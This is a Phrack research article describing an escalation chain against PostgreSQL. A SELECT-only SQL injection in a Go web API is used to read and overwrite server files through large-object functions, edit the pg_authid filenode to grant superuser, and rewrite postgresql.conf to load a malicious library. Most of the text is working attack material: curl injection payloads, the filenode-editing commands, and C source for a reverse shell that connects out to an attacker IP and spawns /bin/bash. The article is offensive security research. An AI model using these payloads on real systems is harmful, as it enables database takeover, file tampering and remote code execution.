Introduction | Phrack Staff |
Phrack Prophile on BSDaemon | Phrack Staff |
Linenoise | Phrack Staff |
Loopback | Phrack Staff |
Phrack World News | Phrack Staff |
MPEG-CENC | David "retr0id" Buchanan |
Bypassing CET & BTI With Functional Oriented Programming | LMS |
World of SELECT-only PostgreSQL Injections | Maksym Vatsyk |
A VX Adventure in Build Systems and Oldschool Techniques | Amethyst Basilisk |
Allocating new exploits | r3tr074 |
Reversing Dart AOT snapshots | cryptax |
Finding hidden kernel modules (extrem way reborn) | g1inko |
A novel page-UAF exploit strategy | Jinmeng Zhou, Jiayi Hu, Wenbo Shen, Zhiyun Qian |
Stealth Shell | Ryan Petrich |
Evasion by De-optimization | Ege BALCI |
Long Live Format Strings | Mark Remarkable |
Calling All Hackers | cts |
==Phrack Inc.== Volume 0x10, Issue 0x47, Phile #0x08 of 0x11 |=-----------------------------------------------------------------------=| |=-----------=[ World of SELECT-only PostgreSQL Injections: ]=-----------=| |=--------------------=[ (Ab)using the filesystem ]=---------------------=| |=-----------------------------------------------------------------------=| |=-------------------------=[ Maksym Vatsyk ]=---------------------------=| |=-----------------------------------------------------------------------=| -- Table of contents 0 - Introduction 1 - The SQLi that started it all 1.0 - Target info 1.1 - A rather trivial injection 1.2 - No stacked queries for you 1.3 - Abusing server-side lo_ functions 1.4 - Not (entirely) a superuser 1.5 - Looking for a privesc 2 - PostgreSQL storage concepts 2.0 - Tables and Filenodes 2.1 - Filenode format 2.2 - Table metadata 2.3 - Cold and Hot Data storages 2.4 - Editing filenodes offline 3 - Updating the PostgreSQL data without UPDATE 3.0 - Identifying target table 3.1 - Search for the associated Filenode 3.2 - Reading and downloading Filenode 3.3 - Extracting table metadata 3.4 - Making ourselves a superuser 3.5 - Flushing Hot storage 4 - SELECT-only RCE 4.0 - Reading original postgresql.conf 4.1 - Choosing a parameter to exploit 4.2 - Compiling malicious library 4.3 - Uploading the stuff back to the server 4.4 - Reload successful 5 - Conclusions 6 - References 7 - Source code --[ 0 - Introduction This article tells the story of how a failed attempt to exploit a basic SQL injection in a web API with the PostgreSQL DBMS quickly spiraled into 3 months of researching database source code and (hopefully) helping to create several new techniques to pwn Postgres hosts in restrictive contexts. Let's get into the story, shall we? --[ 1 - The SQLi that started it all ---[ 1.0 - Target info The target web app was written in the Golang Gin[0] framework and used PGX[1] as a DB driver. What is interesting about the application is the fact that it is a trusted public data repository - anyone can query all data. The updates, however, are limited to a trusted set of users. This means that getting a SELECT SQL injection will have no impact on the application, while DELETE and UPDATE ones will still be critical. Unfortunately, I am not allowed to disclose the source code of the original application, but it can be roughly boiled down to this example (with data and tables changed to something artificial):
package main
import (
"context"
"fmt"
"log"
"net/http"
"github.com/gin-gonic/gin"
"github.com/jackc/pgx/v4/pgxpool"
)
var pool *pgxpool.Pool
type Phrase struct {
ID int `json:"id"`
Text string `json:"text"`
}
func phraseHandler(c *gin.Context) {
phrases := []Phrase{}
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
"SELECT id, text FROM phrases WHERE id=%s",
phrase_id
)
rows, err := pool.Query(context.Background(), query)
defer rows.Close()
if err != nil {
c.JSON(
http.StatusInternalServerError,
gin.H{"error": err.Error()}
)
return
}
for rows.Next() {
var phrase Phrase
err := rows.Scan(&phrase.ID, &phrase.Text)
if err != nil {
c.JSON(
http.StatusInternalServerError,
gin.H{"error": err.Error()}
)
return
}
phrases = append(phrases, phrase)
}
c.JSON(http.StatusOK, phrases)
}
func main() {
pool, _ = pgxpool.Connect(
context.Background(),
"postgres://localhost/postgres?user=poc_user&password=poc_pass")
r := gin.Default()
r.GET("/phrases", phraseHandler)
r.Run(":8000")
defer pool.Close()
}
---[ 1.1 - A rather trivial injection The actual injection happens inside the phraseHandler function on these lines of code. The app directly formats the query parameter id into the query string and calls the pool.Query() function. It couldn't be any simpler, right?
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
"SELECT id, text FROM phrases WHERE id=%s",
phrase_id
)
rows, err := pool.Query(context.Background(), query)
defer rows.Close()
The SQL injection can be quickly confirmed with these cURL requests:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=1"
[
{"id":1,"text":"Hello, world!"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1"
[]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1 OR 1=1"
[
{"id":1,"text":"Hello, world!"},
{"id":2,"text":"A day in paradise."},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
At this moment, our SQL query will look something like:
SELECT id, text FROM phrases WHERE id=-1 OR 1=1
Luckily for us, PostgreSQL drivers should easily support stacked queries, opening a wide range of attack vectors for us. We should be able to append additional queries separated by a semicolon like:
SELECT id, text FROM phrases WHERE id=-1; SELECT pg_sleep(5);
Let's just try it... Oh no, what is that?
$ curl -G "http://172.23.16.127:8000/phrases" \
--data-urlencode "id=-1; SELECT pg_sleep(5)"
{
"error":"ERROR: cannot insert multiple commands into a prepared
statement (SQLSTATE 42601)"
}
---[ 1.1 - No stacked queries for you It turns out that the PGX developers decided to **secure** driver use by converting any SQL query to a prepared statement under the hood. This is done to disable any stacked queries whatsoever[2]. It works because the the PostgreSQL database itself does not allow multiple queries inside a single prepared statement[3]. So, we are suddenly constrained to a single SELECT query! The DBMS will reject any stacked queries, and nested UPDATE or DELETE queries are also prohibited by the SQL syntax.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (UPDATE * phrases SET text='lol')"
{
"error":"ERROR: syntax error at or near \"SET\" (SQLSTATE 42601)"
}
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (DELETE * FROM phrases)"
{
"error":"ERROR: syntax error at or near \"FROM\" (SQLSTATE 42601)"
}
Nested SELECT queries are still possible, though!
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (SELECT 1)=1"
[
{"id":1,"text":"Hello, world!"},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
Since one can read the DB data without the SQLi, is this bug even worth reporting? ---[ 1.2 - Abusing server-side lo_ functions Not all hope is lost, though! Since nested SELECT SQL queries are allowed, we can try to call some of the built-in PostgreSQL functions and see if there are any that can help us. PostgreSQL has several functions that allow reading files from and writing to the server running the DBMS. These functions[4] are a part of the PostgreSQL Large Objects functionality, and should be accessible to the superusers by default: 1. lo_import(path_to_file, lo_id) - read the file into the DB large object 2. lo_export(lo_id, path_to_file) - dump the large object into a file What files can be read? Since the DBMS is normally running under the postgres user, we can search for readable files via the following command:
$ cat /etc/passwd | grep postgres
postgres:x:129:129::/var/lib/postgresql:/bin/bash
$ find / -uid 129 -type f -perm -600 2>/dev/null
...
/var/lib/postgresql/data/postgresql.conf <---- main service config
/var/lib/postgresql/data/pg_hba.conf <---- authentication config
/var/lib/postgresql/data/pg_ident.conf <---- psql username mapping
...
/var/lib/postgresql/13/main/base/1/2654 <---- some data files
/var/lib/postgresql/13/main/base/1/2613
There already is an RCE technique, initially discovered by Denis Andzakovic[5] and sylsTyping[6] in 2021 and 2022, which takes advantage of the postgresql.conf file. It involves overwriting the config file and either waiting for the server to reboot or forcefully reloading the configuration via the pg_reload_conf() PostgreSQL function[7]. We will return to this matter later in the article. For now, let's just check if we have the permissions to call every function mentioned above. Calling lo_ functions:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)) AS text)"
[
{"id":1337,"text":"31337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_get(31337)) AS text)"
[
{"id":1337,"text":"\\x23202d2d2d...72650a"}
]
Large object functions work just fine! We've imported a file into the DB and consequently read it from the object with ID 31337. Calling pg_reload_conf function:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[]
There is a problem with the pg_reload_conf function, however. In success cases, it should return a row with the text "true". Why can we call large object functions but not pg_reload_conf? Shouldn't they both be accessible to a superuser? ---[ 1.3 - Not (entirely) a superuser They should, but we happen to not be one. Our test user has explicit permissions over the large object functions but lacks access to anything else. The permissions should be similar to the below example configuration:
CREATE USER poc_user WITH PASSWORD 'poc_pass'
GRANT pg_read_server_files TO poc_user
GRANT pg_write_server_files TO poc_user
GRANT USAGE ON SCHEMA public TO poc_user
GRANT SELECT, INSERT, UPDATE, DELETE ON TABLE pg_largeobject TO poc_user
GRANT EXECUTE ON FUNCTION lo_export(oid, text) TO poc_user
GRANT EXECUTE ON FUNCTION lo_import(text, oid) TO poc_user
---[ 1.4 - Looking for a privesc If we want to perform RCE through the configuration file reliably, we must find a way to become a superuser and call pg_reload_conf(). Unlike the popular topic of PostgreSQL RCE techniques, there is not a whole lot of information about privilege escalation from within the DB. Luckily for us, the official documentation page for Large Object functions gives us some clues for the next steps[4]: > It is possible to GRANT use of the server-side lo_import and lo_export > functions to non-superusers, but careful consideration of the security > implications is required. A malicious user of such privileges could > easily parlay them into becoming superuser (for example by rewriting > server configuration files) What if we were to modify the PostgreSQL table data directly, on disk, without any UPDATE queries at all? --[ 2 - PostgreSQL storage concepts ---[ 2.0 - Tables and Filenodes PostgreSQL has extremely complex data flows to optimize resource usage and eliminate possible data access conflicts, e.g. race conditions. You can read about them in great detail in the official documentation[8][9]. The physical data layout significantly differs from the widely known "table" and "row" objects. All data is stored on disk in a Filenode object named with the OID of the respective pg_class object. In other words, each table has its Filenode. We can lookup the OID and respective Filenode names of a given table through the following queries:
SELECT oid FROM pg_class WHERE relname='TABLE_NAME'
// OR
SELECT pg_relation_filepath('TABLE_NAME');
All of the filenodes are stored in the PostgreSQL data directory. The path to which can be queried from the pg_settings table by superusers:
SELECT setting FROM pg_settings WHERE name = 'data_directory';
However, this value should generally be the same across different installations of the DBMS and can be easily guessed by a third party. A common path for PostgreSQL data directories on Debian systems is "/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/". We can obtain the major version by running a "SELECT version()" query in the SQLi. The default value of CLUSTER_NAME is "main". An example path of a filenode for our "phrases" would be:
=== in psql ===
postgres=# SELECT pg_relation_filepath('phrases');
pg_relation_filepath
----------------------
base/13485/65549
(1 row)
postgres=# SELECT version();
version
-------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
(1 row)
=== in bash ===
$ ll /var/lib/postgresql/13/main/base/13485/65549
-rw------- 1 postgres postgres 8192 mar 14 13:45 /var/lib/postgresql/13/main/base/13485/65549
So: all of the files with numeric names, found in section 1.2, are in fact separate table filenodes that the postgres user can read and write! ---[ 2.1 - Filenode format A Filenode is a binary file composed of separate chunks of 0x2000 bytes called Pages. Each page holds the actual row data within nested Item objects. The layout of each Filenode can be summarized with the below diagram: +----------+ | Filenode | +----------+-------------------------------------------------------+ | | | +--------+ | | | Page 1 | | | +--------+----+---------+---------+-----+---------+--------+ | | | Page Header |Item ID 1|Item ID 2| ... |Item ID n| | | | +-------------+----+----+---------+ +----+----+ | | | | | | | | | | +-------------------------+--------+ | | | | | | | | | | +-------------------------------------+ | | | | | | | | | | | | ... empty space padded with 0x00 ... | | | | | | | | | | | +----------------------+ | | | | | | | | | | | v v | | | | +--------+ +--------+--------+ | | | | Item n | ... | Item 2 | Item 1 | | | +-------------------------+--------+-----+--------+--------+ | | ... | | +--------+ | | | Page n | | | +--------+ | | ... | | | +------------------------------------------------------------------+ ---[ 2.2 - Table metadata It is worth noting that the Item objects are stored in the binary format and cannot be manipulated directly. One must first deserialize them using metadata from the internal PostgreSQL "pg_attribute" table. We can query Item metadata using the following SQL query:
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = 'TABLE_NAME';
---[ 2.3 - Cold and Hot data storage All of the above objects make up the DBMS' cold storage. To access the data in cold storage through a query, Postgres must first load it in the RAM cache, a.k.a. hot storage. The following diagram shows a rough and simplified flow of how the PostgreSQL accesses the data: +------------------+ +--------+ +------+ +------+ |Table in RAM cache|------>|Filenode|--+--->|Page 1|---+--->|Item 1| +------------------+ +--------+ | +------+ | +------+ | | | +------+ | +------+ +--->|Page 2| +--->|Item 2| | +------+ | +------+ | ... | ... | +------+ | +------+ +--->|Page n| +--->|Item n| +------+ +------+ The DBMS periodically flushes any changes to the data in hot storage to the filesystem. These syncs may pose a challenge to us! Since we can only edit the cold storage of a running database, we risk subsequent hot storage syncs overwriting our edits. Thus, we must ensure that the table we want to overwrite has been offloaded from the cache.
# -----------------------------
# PostgreSQL configuration file
# -----------------------------
...
# - Memory -
shared_buffers = 128MB # min 128kB
# (change requires restart)
...
The default cache size is 128MB. So, if we stress the DB with expensive queries to other tables/large objects before the flush, we might overflow the cache and clear our target table from it. ---[ 2.4 - Editing filenodes offline I've created a tool to parse and modify data stored in filenodes, which functions independently of the Postgres server that created the filenodes. We can use it to overwrite target table rows with our desired values. The editor supports both datatype-assisted and raw parsing modes. The assisted mode is the preferred option as it allows you to edit the data safely, without accidentally messing up the whole filenode structure. The actual parsing implementation is way too lengthy to discuss in this article, but you can find the sources on GitHub[10], or the source code in this article if reading online, if you want to dig deeper into it. You can also check out this article[12] on parsing filenodes in Golang. --[ 3 - Updating the PostgreSQL data without UPDATE ---[ 3.0 - Identifying target table So, we are looking to escalate our permissions to those of a DBMS superuser. Which table should we aim to modify? All Postgres permissions are stored in the internal table "pg_authid". All CREATE/DROP/ALTER statements for new roles and users actually modify this table under the hood. Let's inspect it in a PSQL session under the default super-admin user:
postgres=# SELECT * FROM pg_authid; \x
-[ RECORD 1 ]--+------------------------------------
oid | 3373
rolname | pg_monitor
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | f
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword |
rolvaliduntil |
... TRUNCATED ...
-[ RECORD 9 ]--+------------------------------------
oid | 10
rolname | postgres
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword |
rolvaliduntil |
-[ RECORD 10 ]-+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
The table contains a bunch of "rol" boolean flags and other interesting stuff, like the MD5 hashes of the user logon passwords. The default superadmin user "postgres" has all boolean flags set to true. To become a superuser, we must flip all boolean fields to True for our user, "poc_user". ---[ 3.1 - Search for the associated Filenode To modify the table, we must first locate and read the filenode from the disk. As discussed previously, we won't be able to get the data directory setting from the DBMS, as we lack permissions to read the "pg_settings" table:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT setting FROM pg_settings WHERE name='data_directory')"
{
"error":"can't scan into dest[1]: cannot scan null into *string"
}
However, we can reliably guess the data directory path by querying the version of the DBMS:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT version())"
[
{"id":1337,"text":"PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit"}
]
Version information gives us more than enough knowledge about the DBMS and the underlying server. We can simply install a major version of PostgreSQL release 13 on our own Ubuntu 22 VM and find that the data directory is "/var/lib/postgresql/13/main":
ubuntu@ubuntu-virtual-machine:~$ uname -a
Linux ubuntu-virtual-machine 6.5.0-14-generic #14~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Nov 20 18:15:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
ubuntu@ubuntu-virtual-machine:~$ sudo su postgres
postgres@ubuntu-virtual-machine:~$ pwd
/var/lib/postgresql
postgres@ubuntu-virtual-machine:~$ ls -l 13/main/
total 84
drwx------ 5 postgres postgres 4096 lis 26 14:48 base
drwx------ 2 postgres postgres 4096 mar 15 11:56 global
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_commit_ts
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_dynshmem
drwx------ 4 postgres postgres 4096 mar 15 11:55 pg_logical
drwx------ 4 postgres postgres 4096 lis 26 14:48 pg_multixact
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_notify
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_replslot
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_serial
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_snapshots
drwx------ 2 postgres postgres 4096 mar 11 00:45 pg_stat
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_stat_tmp
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_subtrans
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_tblspc
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_twophase
-rw------- 1 postgres postgres 3 lis 26 14:48 PG_VERSION
drwx------ 3 postgres postgres 4096 lut 4 00:22 pg_wal
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_xact
-rw------- 1 postgres postgres 88 lis 26 14:48 postgresql.auto.conf
-rw------- 1 postgres postgres 130 mar 15 11:55 postmaster.opts
-rw------- 1 postgres postgres 100 mar 15 11:55 postmaster.pid
With the data directory path obtained, we can query the relative path to the "pg_authid" Filenode. Thankfully, there are no permission issues this time.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT pg_relation_filepath('pg_authid'))"
[
{"id":1337,"text":"global/1260"}
]
With all the information in our hands, we can assume that the "pg_authid" Filenode is located at "/var/lib/postgresql/13/main/global/1260". Let's download it to our local machine from the target server. ---[ 3.2 - Reading and downloading the Filenode We can now quickly download the file as a base64 string through the Large Object functions "lo_import" and "lo_get" in the following steps:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_import('/var/lib/postgresql/13/main/global/1260', 331337)) AS text)"
[
{"id":1337,"text":"331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > pg_authid_filenode
After decoding the Base64 into a file, we can confirm that we indeed successfully downloaded the "pg_authid" Filenode by comparing the hashes.
=== on the attacker server ===
$ md5sum pg_authid_filenode
4c9514c6fb515907b75b8ac04b00f923 pg_authid_filenode
=== on the target server ===
postgres@ubuntu-virtual-machine:~$ md5sum /var/lib/postgresql/13/main/global/1260
4c9514c6fb515907b75b8ac04b00f923 /var/lib/postgresql/13/main/global/1260
---[ 3.3 - Extracting table metadata One last step before parsing the downloaded Filenode -- we must get its metadata from the server via the following SQLi query:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,STRING_AGG(CONCAT_WS(',',attname,typname,attlen,attalign),';') FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = 'pg_authid'"
[
{"id":1337,"text":"tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"}
]
We should now be able to use our in-house Python3 Filenode editor to list the data and confirm it is intact. The output for the "rolname" field will be a bit ugly, because for some reason this field is stored in a 64-byte fixed-length string padded with null bytes, instead of the common varchar type:
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m list \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"
[+] Page 0:
--------- item no. 0 ---------
oid : 10
rolname : b'postgres\x00...'
rolsuper : 1
rolinherit : 1
rolcreaterole : 1
rolcreatedb : 1
rolcanlogin : 1
rolreplication: 1
rolbypassrls : 1
rolconnlimit : -1
rolpassword : None
--------- item no. 1 ---------
oid : 3373
rolname : b'pg_monitor\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 0
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : None
... TRUNCATED ...
--------- item no. 9 ---------
oid : 16386
rolname : b'poc_user\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 1
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : b'md58616944eb80b569f7be225c2442582cd'
---[ 3.4 - Making ourselves a superuser We can now use the Filenode editor to update Item no. 9, which contains the entry for "poc_user". For convenience, we can pass any non-printable fields (such as the "rolname" field) as base64 string. We will flip all "rol" flags to 1 with the following editor command:
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m update \
-p 0 \
-i 9 \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d" \
--csv-data "16386,cG9jX3VzZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==,1,1,1,1,1,1,1,-1,md58616944eb80b569f7be225c2442582cd,NULL"
The script will save the updated Filenode to a file with ".new" as an extension. We can now re-upload the data to the PostgreSQL server and overwrite the original data through the SQLi.
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331337, decode('$(base64 -w 0 pg_authid_filenode.new)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331337, '/var/lib/postgresql/13/main/global/1260')) AS text)"
[{"id":1337,"text":"1"}]
So, we've just overwritten the Filenode on the disk! But the RAM cache still has the old data. We must find a way to flush it somehow:
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
---[ 3.5 - Flushing Hot storage So, you may be wondering - how can we force the server to clean the RAM cache? How about creating a Large Object of a size matching the entire cache pool? :DDDDD
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33331337, (SELECT REPEAT('a', 128*1024*1024))::bytea)) AS text)"
[
{"id":1337,"text":"33331337"}
]
The server took at least 5 seconds to process our query, which may indicate our success. Let's check our permissions again:
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user'; \x
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
Success! All "rol" flags were flipped to true! Can we reload the config now?
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
Notice that this query now returns a row with "text" set to "true", confirming that we are indeed able to reload the config now. That's more like it! We can now perform SELECT-only RCE. --[ 4 - SELECT-only RCE ---[ 4.0 - Reading original postgresql.conf The first step in performing the RCE is to download the original config file. Since we are a super-admin now, we can query its path directly from the "pg_settings" table without any extra path guessing effort:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, sourcefile FROM pg_file_settings"
[
{"id":1337,"text":"/etc/postgresql/13/main/postgresql.conf"}
]
Let's download it with the help of previously used Large Object functions:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/etc/postgresql/13/main/postgresql.conf', 3333331337)) AS text)"
[
{"id":1337,"text":"3333331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(3333331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > postgresql.conf
---[ 4.1 - Choosing a parameter to exploit There are several known options that can already be used for an RCE: - ssl_passphrase_command (by Denis Andzakovic[5]) - archive_command (by sylsTyping[6]) But are any other parameters worth looking into?
$ cat postgresql.conf
...
# - Shared Library Preloading -
#local_preload_libraries = ''
#session_preload_libraries = ''
#shared_preload_libraries = '' # (change requires restart)
...
# - Other Defaults -
#dynamic_library_path = '$libdir'
These parameters specify libraries to be loaded dynamically by the DBMS from the path specified in the "dynamic_library_path" variable, under specific conditions. That sounds promising! We will focus on the "session_preload_libraries" variable, which dictates what libraries should be preloaded by the server on a new connection[11]. It does not require a restart of the server, unlike "shared_preload_libraries", and does not have a specific prefix prepended to the path like the "local_preload_libraries" variable. So, we can rewrite the malicious postgresql.conf to have a writable directory in the "dynamic_library_path", e.g. /tmp, and to have a rogue library filename in the "shared_preload_libraries", e.g. "payload.so". The updated config file will look like this:
$ cat postgresql.conf
...
# - Shared Library Preloading -
session_preload_libraries = 'payload.so'
...
# - Other Defaults -
dynamic_library_path = '/tmp:$libdir'
---[ 4.2 - Compiling the malicious library One of the final steps is to compile a malicious library for the server to load. The code will naturally vary depending on the OS the DBMS is running under. For the Unix-like case, let's compile the following simple reverse shell into an .so file. The "_init()" function will automatically fire on library load:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void _init() {
/*
code taken from https://www.revshells.com/
*/
int port = 8888;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
Notice the presence of the "PG_MODULE_MAGIC" field in the code. It is required for the library to be recognized and loaded by the PostgreSQL server. Before compilation, we must install proper PostgreSQL development packages for the correct major version, 13 in our case:
$ sudo apt install postgresql-13 postgresql-server-dev-13 -y
The code can be compiled with gcc with the following command:
$ gcc \
-I$(pg_config --includedir-server) \
-shared \
-fPIC \
-nostartfiles \
-o payload.so \
payload.c
---[ 4.3 - Uploading the config and library to the server With the updated config file and compiled library on our hands, it is time to upload and overwrite everything on the target DBMS host. Uploading and replacing the postgresql.conf file:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331333337, decode('$(base64 -w 0 postgresql_new.conf)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331333337, '/etc/postgresql/13/main/postgresql.conf')) AS text)"
[{"id":1337,"text":"1"}]
Uploading the malicious .so file:
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33313333337, decode('$(base64 -w 0 payload.so)', 'base64'))) AS text)"
[
{"id":1337,"text":"33313333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(33313333337, '/tmp/payload.so')) AS text)"
[{"id":1337,"text":"1"}]
If everything is correct, we should see the updated config and .so file in place:
# .so library
=== target server ===
ubuntu@ubuntu-virtual-machine:/tmp$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
